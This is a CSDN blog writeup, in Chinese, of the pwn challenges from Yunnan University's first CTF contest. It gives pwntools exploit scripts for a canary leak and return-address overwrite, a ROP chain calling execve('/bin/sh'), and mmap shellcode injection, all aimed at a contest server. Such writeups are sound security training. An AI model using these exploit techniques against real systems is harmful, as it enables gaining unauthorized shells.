第一届云南大学CTF校赛YNUCTF-答案(Writeup)

最新推荐文章于 2024-02-02 09:53:20 发布
最新推荐文章于 2024-02-02 09:53:20 发布
阅读量441 收藏 11
点赞数 9
分类专栏: YNUCTF 文章标签: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/llovewuzhengzi/article/details/134697943
版权

文章目录

ikun1

flat()
在pwntools中可以用flat()來构造rop,参数传递用list來传,list中的element为想串接的rop gadget地址,简单来说就是可以把:rop = p32(gadget1) + p32(gadget2) + p32(gadget3) ……变成这样表示:flat([gadget1,gadget2,gadget3,……])

exp

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
s=remote("220.181.151.92",27806)
elf=ELF("./YNU")
#s=process("./pwn")
#gdb.attach(s,"b*main")
s.sendafter(b"Ur name plz?\n",b"a"*0x19) #gdb中不需要回车符也能成功输入
s.recvuntil(b"a"*0x19)
canary=b"\x00"+s.recv(7) ## 利用canary特性得到canary的值

s.sendafter(b"right?",b"Y")
s.sendafter(b"plz.\n",flat([b"a"*0x18,canary,0,0x0000000000401231])) 
s.interactive()

ikun2

exp

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
f=remote("220.181.151.92",27809)
#f=process("./YNU")
#gdb.attach(f,"b*main")
i=1
while(i<=100):
    f.recvuntil(b"===\n")
    a=f.recvuntil(b"+")[:-1]
    b=f.recvuntil(b"=")[:-1]
    f.sendline(str(int(a)+int(b)).encode())
    i=i+1
f.interactive()

ikun3

学会ROPgadget
学学系统调用就行了

exp

from pwn import *
sh=remote("220.181.151.92",27818)
#sh = process('./YNU')

pop_eax_ret = 0x080bb196
pop_edx_ecx_ebx_ret = 0x0806eb90
int_0x80 = 0x08049421
binsh = 0x80be408
payload = flat(
    ['A' * 112, pop_eax_ret, 0xb, pop_edx_ecx_ebx_ret, 0, 0, binsh, int_0x80]) 
sh.sendline(payload)
sh.interactive()

ikun4

exp

输入位置起始为0x13370000
源码中mmap分配的起始地方就是输入的地方
,

from pwn import *
# specify the cpu arch
context.arch = 'amd64'

shellcode = asm('''
    mov rax, 0x3b
    mov rdi, (0x13370000+90)
    xor rsi, rsi
    xor rdx, rdx
    syscall
''')
shellcode = shellcode.ljust(90) + b'/bin/sh\x00'
p=remote("220.181.151.92", 27827)
#p = process('./YNU')
p.sendlineafter('(max: 100): ', shellcode)
p.interactive()
看星猩的柴狗
关注
  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
一步一步学pwntools(适合新手)
qq_41683305的博客
04-09 4899
pwntools是一个二进制利用框架。官方文档提供了详细的api规范。然而目前并没有一个很好的新手教程。因此我用了我过去的几篇writeup。由于本文只是用来介绍pwntools使用方法,我不会过于详细的讲解各种二进制漏洞攻击技术。 Pwntools的“Hello World” 栈溢出无疑是二进制攻击的“Hello World”。这里,我们用pwnable.kr的bof来进行展示。 #incl...
PWN工具之Pwntools
CYXMDTT的博客
03-25 3886
pwntools是一个Python库,用于编写和利用漏洞利用工具和exploit代码。该库提供了许多功能,包括远程连接、二进制文件解析、shellcode生成、ROP链构建、GDB集成等,使渗透测试人员和安全研究人员更容易编写和测试漏洞利用代码。它是CTF竞赛和漏洞利用开发中广泛使用的工具之一。安装pwntools有多种方法,其中最简单的方法是使用pip包管理器。可以按照以下步骤安装pwntools。1:确认你已安装Python和pip。如果你还没有安装,先安装Python和pip。
CTF-pwn pwntools用法探索
最新发布
dzqxwzoe的博客
02-02 1520
相信各位CTF pwners一定对pwntools熟悉得不能再熟悉,做一道题时写下的第一行代码很可能就是。很多pwners对于pwntools的了解可能仅限于远程交互、ELF文件简单分析这些最基础的功能,但pwntools真的只有这些功能吗?你真的会使用pwntools吗?本文从入手,进行pwntools功能的探索。
python pwntools库 简介 主要功能有 网络 进程 文件 编解码 elf 汇编 调试
whatday的专栏
11-29 3101
Pwntools是一个工具包,使选手们在CTF期间的尽可能容易的编写EXP,并使EXP尽可能的容易阅读。有些代码每个人都写过无数次,而且每个人都有自己的方法。Pwntools的目标是以半标准的方式提供所有这些,这样你就可以停止复制粘贴相同的代码,而是使用更多稍微清晰的包装器,如pack或p32甚至。除了对日常的功能进行方便的包装外,它还提供了一套非常丰富的IO管道,将所有你曾经执行过的IO封装在一个统一的界面中。从本地攻击切换到远程攻击,或者通过SSH进行本地攻击,都只是修改一行代码的工作。
pwntools各使用模块简介
weixin_34259232的博客
09-12 891
pwntools pwntools 是一款专门用于CTF Exploit的python库,能够很方便的进行本地与远程利用的切换,并且里面包含多个模块,使利用变得简单。可以在github上直接搜索pwntools 进行安装。 基本模块 asm : 汇编与反汇编,支持x86/x64/arm/mips/powerpc等基本上所有的主流平台dynelf : 用于远程符号泄漏,需要提供leak方法el...
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
wani-writeup:大阪大学CTF团队Wani Hackase提供的CTF解决方案
04-30
大阪大学CTF团队Wani Hackase提供的CTF解决方案 这是大阪大学CTF团队Wani Hackase的写存储区。 如何使用 /YYYY/MM-eventName/problemFormat-problemName/README.md # Example /2018/05-plaid/cry-braid/README.md ...
ctf-all-in-one
01-30
ctf-all-in-one
CTF比赛收集的赛题和writeup.zip
09-30
CTF(Capture The Flag)比赛是信息...通过阅读和研究"CTF-WP-main"中的赛题和writeup,不仅可以学习到上述知识点,还能了解到实际问题的解决思路和策略,这对于提升个人的网络安全技能和团队合作能力具有显著的帮助。
麟阁CTF天梯赛ftp-smtp
12-22
【标题】:“麟阁CTF天梯赛ftp-smtp”是一个网络安全竞赛,主要涉及FTP(File Transfer Protocol)和SMTP(Simple Mail Transfer Protocol)两大网络协议的挑战。在这样的比赛中,参赛者通常需要通过分析网络流量...
pwntools工具的使用(随时更新中...)
lifanxin的博客
12-11 4792
pwntools工具的使用基本交互和输入输出绑定要处理的程序获取程序输出实现输入 基本交互和输入输出 绑定要处理的程序 # 远程 # remote(ip/hostname, port) p = remote("127.0.0.1", 8888) # 本地 # 注意process中参数一定要有./ p = process("./pwn") 获取程序输出 buf = p.recvline() # buf为程序的一行输出 buf = p.recv() # buf为程序的当前全部输出 # 直
pwn 暑假复习三 libc泄露
SsMing的博客
07-15 7380
ctfwiki例一:ret2libc2拿到程序checksec查看:没什么问题源码int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 1, 0); p...
关于PwnTools的各种汇总
分不清东西南北的Laffey
09-26 2822
大致框架 官网的一个简单样例 from pwn import * #用来导入pwntools模块 context(arch = 'i386', os = 'linux') #用来设置目标机的信息 r = remote('exploitme.example.com', 31337) #建立一个远程连接 url或者ip作为地址 指明端口 r.send(asm(shellcraft.sh())) ...
python3-pwntools教程_pwntools的简单介绍
weixin_42502378的博客
01-14 1330
pwntools是一个CTF框架和漏洞利用开发库,用Python开发,旨在让使用者简单快速的编写exploit。这里简单的介绍一下pwntools的使用。首先就是导入包from pwn import *你将在全局空间里引用pwntools的所有函数。现在可以用一些简单函数进行汇编,反汇编,pack,unpack等等操作。将包导入后,我一般都会设置日志记录级别,方便出现问题的时候排查错误contex...
PWN简单堆栈溢出漏洞利用(二)
SkYe's Blog
08-12 786
PWN简单堆栈溢出漏洞利用(二) 题目来源 下载链接(密码akcz) 题目需要读取flag文件才能正确显示出flag,也就是下文中显示的 This is flag 创建办法: 在/home/pwn/pwn1目录下创建一个名为flag文件,打开并写入This is flag 1. 运行程序、查看文件类型、保护措施 程序让我们输入一段字符串,并返回我们所输入的内容。 看到是一个 32位 动态链...
好好说话之ret2_dl_runtime_resolve
hollk’s blog
07-21 2750
当初毕业论文就写了一万五千字,没想到一篇ret2_dl_runtime_resolve博客三万两千字~~我吐了~~ 。由于内容比较详细,无法避免有些知识点会忘记,可以通过目录翻阅忘记的内容 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
pwntools介绍及使用
热门推荐
cm_zl
04-27 1万+
什么是pwntools? 简单来说就以一整套pwn工具集,涵盖了pwn题利用脚本所需要的各种工具。 Pwntools主要作用? 包括方便的IO交互函数,ROP、格式化字符串等利用的自动化工具,shellcode生成器等等。 为什么选择pwntools? 目前最好用也是仅有的大型pwn利用框架。能节省大量编写脚本的时间。 Pwntools模块总览 pwntools使用参考文献 Pwnlib.asm ...
Pwntools 2022简明手册
kelxLZ的博客
02-26 1万+
Author:ZERO-A-ONE Date:2022-02-24 本文翻译自:https://github.com/Gallopsled/pwntools-tutorial,主要是考虑到目前中文互联网中关于系统介绍pwntools使用方法的文章都比较老和杂乱,且转换为Python3后又有许多零零散散的问题,看到这个仓库中包含了很多使用技巧和调试问题的解决方案,感到可以翻译一下 这个资源库包含了一些开始使用pwntools(和pwntools)的基本教程。 这些教程并不致力于解释逆向工程或利用,而是.
pwn(三)
小明的小书包Ya
10-04 2403
pwn(三) 简单的溢出利用方法 程序没有开启任何保护 方法一:寻找程序中system的函数,再布局栈空间,最后成功调用system('/bin/sh') 方法二:将我们的shellcode写入bss段,然后用elf.bss()来获取bss段地址,从而程序流向到我们的shellcode 这里不用具体程序分析了,把payload分别写上 方法一:payload = 'a' * offset...
php upload ctf,强网杯CTF防御赛ez_upload Writeup
05-14
从上述代码中我们可以发现,这是一个文件上传的代码,该代码运行后会将用户上传的文件存储到 `upload` 目录下。 但是,该代码没有对上传的文件类型进行限制,这意味着我们可以上传任何类型的文件,甚至是一些恶意的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

看星猩的柴狗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值